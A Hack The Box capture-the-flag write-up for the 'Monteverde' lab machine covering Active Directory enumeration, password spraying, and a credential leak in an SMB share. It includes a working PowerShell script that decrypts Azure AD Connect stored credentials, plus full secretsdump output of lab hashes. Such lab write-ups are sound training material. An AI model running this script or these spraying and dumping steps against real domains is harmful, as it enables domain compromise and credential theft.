HTB Writeup: Monteverde

What could go wrong in a synced bank?

Enumeration

nmap scan

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 17:45 IST
Nmap scan report for 10.129.134.71 (10.129.134.71)
Host is up (0.076s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-29 12:17:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
49751/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-06-29T12:18:13
|_  start_date: N/A
|_clock-skew: 5s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.55 seconds
  1. The target machine is a domain controller for active directory. Following information is obtained from the nmap results: a. Domain: MEGABANK.LOCAL0

    b. RPC is enabled.

RPC Enumeration

  1. RPC connection is obtained using blank credentials rpcclient -U '%' <IP>

    # enumdomains
    name:[MEGABANK] idx:[0x0]
    name:[Builtin] idx:[0x0]
       
    # enumdomusers
    user:[Guest] rid:[0x1f5]
    user:[AAD_987d7f2f57d2] rid:[0x450]
    user:[mhope] rid:[0x641]
    user:[SABatchJobs] rid:[0xa2a]
    user:[svc-ata] rid:[0xa2b]
    user:[svc-bexec] rid:[0xa2c]
    user:[svc-netapp] rid:[0xa2d]
    user:[dgalanos] rid:[0xa35]
    user:[roleary] rid:[0xa36]
    user:[smorgan] rid:[0xa37]
       
    # getpwinfo
    min_password_length: 7
    password_properties: 0x00000000
       
    # enumdomgroups
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Group Policy Creator Owners] rid:[0x208]
    group:[Cloneable Domain Controllers] rid:[0x20a]
    group:[Protected Users] rid:[0x20d]
    group:[DnsUpdateProxy] rid:[0x44e]
    group:[Azure Admins] rid:[0xa29]
    group:[File Server Admins] rid:[0xa2e]
    group:[Call Recording Admins] rid:[0xa2f]
    group:[Reception] rid:[0xa30]
    group:[Operations] rid:[0xa31]
    group:[Trading] rid:[0xa32]
    group:[HelpDesk] rid:[0xa33]
    group:[Developers] rid:[0xa34]
       
    # querydispinfo
    index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
    index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
    index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
    index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
    index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
    index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
    index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
    index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
    index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)
    
  2. A list of domain users, domain groups, and description of domain users has been obtained.

Password Spraying

  1. A wordlist comprised of domain user’s usernames can be used as username and password spraying. This’ll help to identify if any user exist that has the password same as the username.

  2. https://github.com/byt3bl33d3r/CrackMapExec can be used to attempt a password spray with such scenario.

    cme smb MEGABANK.LOCAL -u domain_users.txt -p domain_users.txt --continue-on-success
       
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:mhope STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-ata STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-bexec STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-netapp STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:dgalanos STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:roleary STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:smorgan STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:Guest STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:Guest STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-bexec STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-netapp STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:dgalanos STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:roleary STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:smorgan STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:Guest STATUS_LOGON_FAILURE
    SMB         MEGABANK.LOCAL  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
    ...
    
  3. It is found that the user SABatchJobs has the password SABatchJobs. These credentials can be used to enumerate further.

SMBMap

  1. Using the credentials SABatchJobs:SABatchJobs available and accessible SMB Shares can be enumerated using smbmap

    smbmap -H MEGABANK.LOCAL -d MEGABANK.LOCAL -u SABatchJobs -p SABatchJobs
       
         SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                         https://github.com/ShawnDEvans/smbmap
       
    [+] IP: 10.129.134.71:445       Name: MEGABANK.LOCAL            Status: Authenticated
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            azure_uploads                                           READ ONLY
            C$                                                      NO ACCESS       Default share
            E$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            NETLOGON                                                READ ONLY       Logon server share
            SYSVOL                                                  READ ONLY       Logon server share
            users$                                                  READ ONLY
    
  2. The user SABatchJobs has READ ONLY privileges on following SMB Share:

    1. azure_uploads
    2. users$
    3. SYSVOL
  3. On connecting to users$ share, folders for other domain users are found.

    Untitled

  4. Looking for interesting files, a file named azure.xml is found in the folder mhope

  5. Contents of users$\mhope\azure.xml:

    <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
      <Obj RefId="0">
        <TN RefId="0">
          <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
          <T>System.Object</T>
        </TN>
        <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
        <Props>
          <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
          <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
          <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
          <S N="Password">4n0therD4y@n0th3r$</S>
        </Props>
      </Obj>
    </Objs>
    
  6. Another credentials are obtained: mhope:4n0therD4y@n0th3r$

User Access

  1. Using the evil-winrm and credentials MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$, a successful remote powershell session is obtained.

    Untitled

Privilege Escalation

Enumeration

  1. The user mhope is the member of the domain group Azure Admins, along with users Administrator and AAD_987d7f2f57d2.

    Untitled

  2. Sharphound is executed with all collection methods and data is further analyzed in Bloodhound.

  3. No interesting or obvious findings were made.

Azure ADConnect

  1. On further enumeration, it is found the domain has Azure AD Connect service deployed. Azure AD Connects keep the Azure environment synced with local active directory. According to Microsoft documentation:

    Azure AD Connect provides the following features:

    • Password hash synchronization - A sign-in method that synchronizes a hash of a users on-premises AD password with Azure AD.
    • Pass-through authentication - A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn’t require the additional infrastructure of a federated environment.
    • Federation integration - Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
    • Synchronization - Responsible for creating users, groups, and other objects. As well as, making sure identity information for your on-premises users and groups is matching the cloud. This synchronization also includes password hashes.
    • Health Monitoring - Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.

    Since it can Sync the complete AD and password hashes, it is implied that this service has DCSync Privileges in the domain.

    Untitled

  2. On reading description for the user AAD_987d7f2f57d2, it is confirmed.

    Untitled

  3. According to Azure AD Connect for Red Teamers, the members of Azure Admins group should have read rights on database ADSync in MS-SQL server which contains encrypted configuration being used for the AD Connect service.

Exploitation

  1. Using the following script, the credentials from the ADSync database can be recovered. ( Original Script from Azure AD Connect for Red Teamers might require SQL Server with remote connections enabled, which failed in current environment)

    Write-Host "Step 1: Gathering Key_ID, Instance_ID, and Entropy"
       
    $basic_data = (Invoke-SQLCmd "USE ADSync; SELECT keyset_id, instance_id, entropy FROM mms_server_configuration")
       
    $key_id = $basic_data.keyset_id
    $instance_id = new-object System.Guid($basic_data.instance_id)
    $entropy = new-object System.Guid($basic_data.entropy)
       
    Write-Host "Step 2: Gathering Private and Encrypted Configuration"
    $advanced_data = (Invoke-SQLCmd "USE ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'")
       
    $config = $advanced_data.private_configuration_xml
    $crypted = $advanced_data.encrypted_configuration
       
    Write-Host "Step 3: Load mcrypt.dll and Decrypt the credentials"
    add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
    $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
    $km.LoadKeySet($entropy, $instance_id, $key_id)
    $key = $null
    $km.GetActiveCredentialKey([ref]$key)
    $key2 = $null
    $km.GetKey(1, [ref]$key2)
    $decrypted = $null
    $key2.DecryptBase64ToString($crypted, [ref]$decrypted)
       
    $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
    $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
    $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
       
    Write-Host "Recovered Azure ADSync Credentials Successfully"
       
    Write-Host ("Domain: " + $domain.Domain)
    Write-Host ("Username: " + $username.Username)
    Write-Host ("Password: " + $password.Password)
    
  2. The credentials administrator:d0m@in4dminyeah! are recovered successfully.

    Untitled

  3. Using the credentials, the domain hashes, cached credentials, and SAM hashes are dumped successfully via secretsdump.py

    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
       
    [*] Service RemoteRegistry is in stopped state
    [*] Starting service RemoteRegistry
    [*] Target system bootKey: 0x192876d20aae88363bdf48202b9e82b8
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:883f830badb518441e2538599cd3e2bc:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
    [*] Dumping cached domain logon information (domain/username:hash)
    [*] Dumping LSA Secrets
    [*] $MACHINE.ACC
    MEGABANK\MONTEVERDE$:aes256-cts-hmac-sha1-96:5a7a61d36799e0c3ab821f0cad6dcae0625d5c046834a4f4b24f16d6bb390f85
    MEGABANK\MONTEVERDE$:aes128-cts-hmac-sha1-96:f236a2be529d6b0c01ddf8346e9b2e83
    MEGABANK\MONTEVERDE$:des-cbc-md5:462a49f4b5a1f8da
    MEGABANK\MONTEVERDE$:plain_password_hex:f6d6354ff49f2cf13c169ec5aadb747e8450be9c257a2aaa82b8c22c31cf6bc9ca8740c46ed1b349f51fae58bab10e52c38f0e11550615321cf8eb66ede09e1678c1268e1d5b5ba34e0fb8962211763342c48a4977205a084df57b161776a99c5b803200e5bc26bcd2966e33d7503b48557db998eb72a7b733ab33ad0275e3f52e3987d313fb12f5cece27b6875569cd4ae581be009f24094b247d78cb544cd58ec20f77695584aabedf2633e7161711eeb46df90ba1b02e1fab50cbf8408790cf534d95c03a192d3ae59bae939acbcc25154d2ea7316128493696ee532876af228f4604cb5614816ac6197be1b2f9d9
    MEGABANK\MONTEVERDE$:aad3b435b51404eeaad3b435b51404ee:bea2a16e3d0d4df72cde4c657710cf4c:::
    [*] DPAPI_SYSTEM
    dpapi_machinekey:0x8c1cd23a436f651c82e3d6d9f07e2d0e5a5435b5
    dpapi_userkey:0xa941235813fe8db86c5c70713229c093f1f53ffb
    [*] NL$KM
     0000   26 5F A2 C6 E9 D2 76 5E  D1 EB 1F 59 86 99 03 79   &_....v^...Y...y
     0010   F0 68 ED 0E 10 D1 BE 62  3A 6D 25 6C D5 A2 62 9C   .h.....b:m%l..b.
     0020   99 30 15 AE AB 8D 7C 3E  B8 07 1A 1F F6 2A C3 DB   .0....|>.....*..
     0030   F1 D0 33 56 72 7C 33 F2  E8 AE FE 39 10 12 94 F6   ..3Vr|3....9....
    NL$KM:265fa2c6e9d2765ed1eb1f5986990379f068ed0e10d1be623a6d256cd5a2629c993015aeab8d7c3eb8071a1ff62ac3dbf1d03356727c33f2e8aefe39101294f6
    [*] _SC_ADSync
    MEGABANK\AAD_987d7f2f57d2:;Sm@>Fpu-u@*FT!Ry%.*O(*pe6X%>{32W%t#o%V%F;{;f#ONA-z(D_#^$Qq#$5=cA7Y4(dvHW*b-)MbegB]m*>$r84:NTJ)%3QQHi+&E#vkevIToo3l%*LYV.5AjI{I
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff:::
    AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06:::
    MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6:::
    MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1:::
    MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea:::
    MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3:::
    MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6:::
    MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736:::
    MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8:::
    MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388:::
    MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:bea2a16e3d0d4df72cde4c657710cf4c:::
    
  4. Using smbexec.py, a powershell semi-interactive shell is obtained running with privileges of NT Authority/System

    Untitled

The remote target is now completely compromised.

Avatar
Mayank Malik
ISC2 CC | CRTP | Incident Response | Synack Red Team Member | Threat and Malware Analyst | Security Researcher

I am a tech-savvy person, Red Team Enthusiast, and like to wander around to learn new stuff. Malware Analysis, Cryptography, Networking, and System Administration are some of my forte. One of the Founding Members of CTF Team, Abs0lut3Pwn4g3. Apart from the mentioned skills, I’m good at communication skills and am a goal-driven person. Yellow belt holder at pwn.college in pursuit of learning and achieving Blue Belt.

Related